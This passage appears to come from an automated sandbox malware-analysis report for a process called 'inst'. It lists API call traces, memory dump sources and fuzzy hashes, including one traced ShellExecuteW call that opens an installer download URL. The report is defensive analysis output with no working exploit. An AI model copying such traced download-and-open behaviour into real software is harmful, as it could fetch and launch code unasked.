                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::exception::exception
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3715980512-0
                                                                                                                                                                                                                      • Opcode ID: dc0c0feab3d43feb3a8902122439d0436b382fdf70788cee2840a3e7126f9581
                                                                                                                                                                                                                      • Instruction ID: af386e0d315dc1682175b661498fcd0da183d726d38e96f839040261ddc9e443
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc0c0feab3d43feb3a8902122439d0436b382fdf70788cee2840a3e7126f9581
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E0F0277070A10B62CF045671D8009DD3B789F4231CF10812BE91097DE0DF61DA0C96BE
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _malloc.LIBCMT ref: 00AF5560
                                                                                                                                                                                                                        • Part of subcall function 00AF5674: __FF_MSGBANNER.LIBCMT ref: 00AF5697
                                                                                                                                                                                                                        • Part of subcall function 00AF5674: __NMSG_WRITE.LIBCMT ref: 00AF569E
                                                                                                                                                                                                                        • Part of subcall function 00AF5674: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,00B005A7,?,00000001,?,?,00B03329,00000018,00B4EF60,0000000C,00B033BA), ref: 00AF56EB
                                                                                                                                                                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 00AF5583
                                                                                                                                                                                                                        • Part of subcall function 00AF552B: std::exception::exception.LIBCMT ref: 00AF5537
                                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00AF55A5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::exception::exception
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3715980512-0
                                                                                                                                                                                                                      • Opcode ID: 460feee1c8ed4d11225c7b0b31041980b9352cd7d77dca4e82e7da2712711346
                                                                                                                                                                                                                      • Instruction ID: c41f336ac7552dcf3b8d1c2e475ec5350ac947c63ea9167572182f3dc966f10f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 460feee1c8ed4d11225c7b0b31041980b9352cd7d77dca4e82e7da2712711346
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6DF02731C00A0C22CB1477F4ED06EBD3BE98F05314F4440A4FB059A0A2DF21DB44C691
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • IsWindow.USER32(?), ref: 00AC152B
                                                                                                                                                                                                                      • PostMessageW.USER32(?,000008C7,?,?), ref: 00AC154E
                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00AC155A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InvalidateMessagePostRectWindow
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2061673745-0
                                                                                                                                                                                                                      • Opcode ID: a6b3707076a7611dedbd5131c3f52c22408c1fbb7479b47734e66d9860b4dd5b
                                                                                                                                                                                                                      • Instruction ID: cfa34625eb81f83a81d367fe8d4c8039e681af88caaaf370ab878c5da7aae210
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a6b3707076a7611dedbd5131c3f52c22408c1fbb7479b47734e66d9860b4dd5b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1F05E71610A10AAEB324B6ADC08FA7BBF9FF94700F00041EF1A6C2160CAB19402EB60
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _wcslen$_wcscpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3469035223-0
                                                                                                                                                                                                                      • Opcode ID: 688fe22aace665f526812ecd71053a3813945175e789a1431b953bff6509cf06
                                                                                                                                                                                                                      • Instruction ID: 7ff593634904b9e469126ce73a44c67d51d27f6e715416d2f7d0431ce68634d9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 688fe22aace665f526812ecd71053a3813945175e789a1431b953bff6509cf06
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67E0D8323042105FD6282549A802B3FB3E9CBD6B33F20081FF640D31C1DA745C414158
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: H_prolog3
                                                                                                                                                                                                                      • String ID: CAB
                                                                                                                                                                                                                      • API String ID: 431132790-4230853747
                                                                                                                                                                                                                      • Opcode ID: c331919610bae9f0bae759b44ec8b3bffbaca9518d6a4925e332ef7cb8e6da33
                                                                                                                                                                                                                      • Instruction ID: e7cf413ecb0e9e4a9f987c334afb29f0396fffe6cd2d9156e244778195b27798
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c331919610bae9f0bae759b44ec8b3bffbaca9518d6a4925e332ef7cb8e6da33
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71F04435E04226D7DB14FBF48E03FBF76749F11B60F140274A713A61D5EAB05A82DA94
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(?,?,00000001,00000000,?,00000000,?,00A7E9A6,?), ref: 00A7E80F
                                                                                                                                                                                                                        • Part of subcall function 00A7E9E0: _memset.LIBCMT ref: 00A7EA12
                                                                                                                                                                                                                        • Part of subcall function 00A7E9E0: _wcsncpy.LIBCMT ref: 00A7EA29
                                                                                                                                                                                                                        • Part of subcall function 00A7E9E0: _wcsncat.LIBCMT ref: 00A7EA3C
                                                                                                                                                                                                                        • Part of subcall function 00A7E9E0: _wcsncat.LIBCMT ref: 00A7EA53
                                                                                                                                                                                                                        • Part of subcall function 00A7E9E0: _wcsncat.LIBCMT ref: 00A7EA66
                                                                                                                                                                                                                        • Part of subcall function 00A7E9E0: _wcsncat.LIBCMT ref: 00A7EA7D
                                                                                                                                                                                                                        • Part of subcall function 00A7E9E0: _wcsncat.LIBCMT ref: 00A7EA90
                                                                                                                                                                                                                        • Part of subcall function 00A7E9E0: _wcsncat.LIBCMT ref: 00A7EAA7
                                                                                                                                                                                                                        • Part of subcall function 00A7E9E0: GetActiveWindow.USER32 ref: 00A7EAB7
                                                                                                                                                                                                                        • Part of subcall function 00A7E9E0: MessageBoxW.USER32(00000000), ref: 00A7EABE
                                                                                                                                                                                                                        • Part of subcall function 00A7E9E0: __wcsnicmp.LIBCMT ref: 00A7EADA
                                                                                                                                                                                                                        • Part of subcall function 00A7E9E0: ShellExecuteW.SHELL32(00000000,open,http://down.360safe.com/setup.exe,00000000,00000000,00000005), ref: 00A7EB0E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _wcsncat$ActiveExecuteLibraryLoadMessageShellWindow__wcsnicmp_memset_wcsncpy
                                                                                                                                                                                                                      • String ID: 360
                                                                                                                                                                                                                      • API String ID: 4220467963-1990796034
                                                                                                                                                                                                                      • Opcode ID: 48ba895e1fb60215f48773b5fc21f19d7cbd3586e651e92f49cc5715e8bd031a
                                                                                                                                                                                                                      • Instruction ID: 4bec71327502b57966da7d3dd09c2922e1bc5ff073f297cde2c700317498e68e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48ba895e1fb60215f48773b5fc21f19d7cbd3586e651e92f49cc5715e8bd031a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1AE0D8722553107BDA20E7109D0AFDBA3CCDF5875AF10C87BF609E2080E7B0981487A7
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000CCC,?,00A74728,00000000,00000000,00000CCC,00000040), ref: 00A74576
                                                                                                                                                                                                                        • Part of subcall function 00A73E90: ReadFile.KERNEL32(?,?,?,?,00000000,?,00A74DC5,?,00000000,?,00000000,?,?,00A71043,?), ref: 00A73E9B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$PointerRead
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3154509469-0
                                                                                                                                                                                                                      • Opcode ID: 11202f03aacfc0ee3fcef68d56221a0a959ae0bb993589fa85621cca355015e6
                                                                                                                                                                                                                      • Instruction ID: 9d48c072790c6c4119bcf77808cd559a9c7255716a04933e5765c10252cfbb8d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 11202f03aacfc0ee3fcef68d56221a0a959ae0bb993589fa85621cca355015e6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F715872A04702AFD714DF68DD80A6AB7E5FB88310F58CA2DF85883741E735ED548B92
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ClientRectShowWindow
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2134488367-0
                                                                                                                                                                                                                      • Opcode ID: 29c265a27e0d08e4eefbd81eb37a89a549e692178d041584f68a942fff0adb79
                                                                                                                                                                                                                      • Instruction ID: 59804a2bd46f2e3df54d99019c40fb5c80f0af19b77152a2c01c549ccf035994
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 29c265a27e0d08e4eefbd81eb37a89a549e692178d041584f68a942fff0adb79
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E512A71900209AFCB10DFA4C888DEEBBB8FF59344B144559F856DB2A1EB35DA46CF50
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetFileSizeEx.KERNEL32(?,?,?,00000000,?,?,?), ref: 00A75B70
                                                                                                                                                                                                                      • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,00000000,?,?,?), ref: 00A75BC9
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$PointerSize
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3549600656-0
                                                                                                                                                                                                                      • Opcode ID: f6b59bcf6bdbebebc063f7f34d38cf6db94281b0434562df5a5ca762cfff4dfd
                                                                                                                                                                                                                      • Instruction ID: a5d3cf1a519cbbb26fcd951edb8a47201cca09d6d6f785391bbe170ae5b7ad26
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f6b59bcf6bdbebebc063f7f34d38cf6db94281b0434562df5a5ca762cfff4dfd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB21F032B003045BD7109F7AEC80B1BB7D9EBC4711F89847AE90CD3240EA76EC098762
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00001000,?,00000000), ref: 00AE00AC
                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00AE00EF
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                                                                                      • Opcode ID: 7f313525271d3959348dc6e9b227cb81cc2c30880c5c277e83eef042df913ec5
                                                                                                                                                                                                                      • Instruction ID: 45ef38c1a333c5e507a6f6331703a8831caf59730e76a01d970107d1d175f63d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7f313525271d3959348dc6e9b227cb81cc2c30880c5c277e83eef042df913ec5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B0316B71A002499FDB30CFA6CC50BEEB778FF45315F254539E858EB282EB7099468B10
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00AC20B3
                                                                                                                                                                                                                        • Part of subcall function 00AA7451: BeginPaint.USER32(?,?), ref: 00AA746E
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00AC20E0
                                                                                                                                                                                                                        • Part of subcall function 00AA7323: CreateCompatibleDC.GDI32(?), ref: 00AA7347
                                                                                                                                                                                                                        • Part of subcall function 00AA7323: SelectObject.GDI32(?,?), ref: 00AA736E
                                                                                                                                                                                                                        • Part of subcall function 00AA7323: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 00AA7387
                                                                                                                                                                                                                        • Part of subcall function 00AB6537: GetWindowRect.USER32(?,00000000), ref: 00AB6554
                                                                                                                                                                                                                        • Part of subcall function 00AC1F15: __EH_prolog3.LIBCMT ref: 00AC1F1C
                                                                                                                                                                                                                        • Part of subcall function 00AC1F15: IsWindowEnabled.USER32(?), ref: 00AC1F26
                                                                                                                                                                                                                        • Part of subcall function 00AC1F15: GetClientRect.USER32(?,?), ref: 00AC1F5D
                                                                                                                                                                                                                        • Part of subcall function 00AC1F15: GetWindowTextW.USER32(?,00000000,00000080), ref: 00AC1FA2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: RectWindow$Client$BeginCompatibleCreateEnabledH_prolog3H_prolog3_ObjectPaintSelectTextViewport
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2602395704-0
                                                                                                                                                                                                                      • Opcode ID: 9e66f35f998641bf215e5eac1ba8c880b731fe7261790f46bbcff2a8f79aab14
                                                                                                                                                                                                                      • Instruction ID: 7ef2dcea93987d1450ef3adb9a9c7b03e16de624eab27c701b18c36bb64faaa4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e66f35f998641bf215e5eac1ba8c880b731fe7261790f46bbcff2a8f79aab14
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B5117971D00618DADF21EBA5C981FAEFBBAAF59300F11800EE14AA7162CF305A01DB61
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetLastError.KERNEL32(0000000E,00000000,00000000,?,?,6C654DB4,?,?,?,?,?,00000001,?,?,?,00000000), ref: 6C5E4D23
                                                                                                                                                                                                                      • CreateWindowExW.USER32(?,00000000,?,?,?,00000002,?,?,?,00000000,?,6C703338), ref: 6C5E4D94
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateErrorLastWindow
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3732789607-0
                                                                                                                                                                                                                      • Opcode ID: 588f52e849d6806f6ca2bbdc58e7028fa4e97c71e7176d1ab30691f3a8b4e870
                                                                                                                                                                                                                      • Instruction ID: d11c50fe425511c741914b5bc85900bef311942ee5f63e9e60478a28ed2ceb72
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 588f52e849d6806f6ca2bbdc58e7028fa4e97c71e7176d1ab30691f3a8b4e870
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E110671200209EFDB018F95CE05FEA77B9EB4C314F058129BD549A6A0D7B4E860CBA4
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetLastError.KERNEL32(0000000E), ref: 00AC56D5
                                                                                                                                                                                                                      • CreateWindowExW.USER32(?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 00AC5746
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
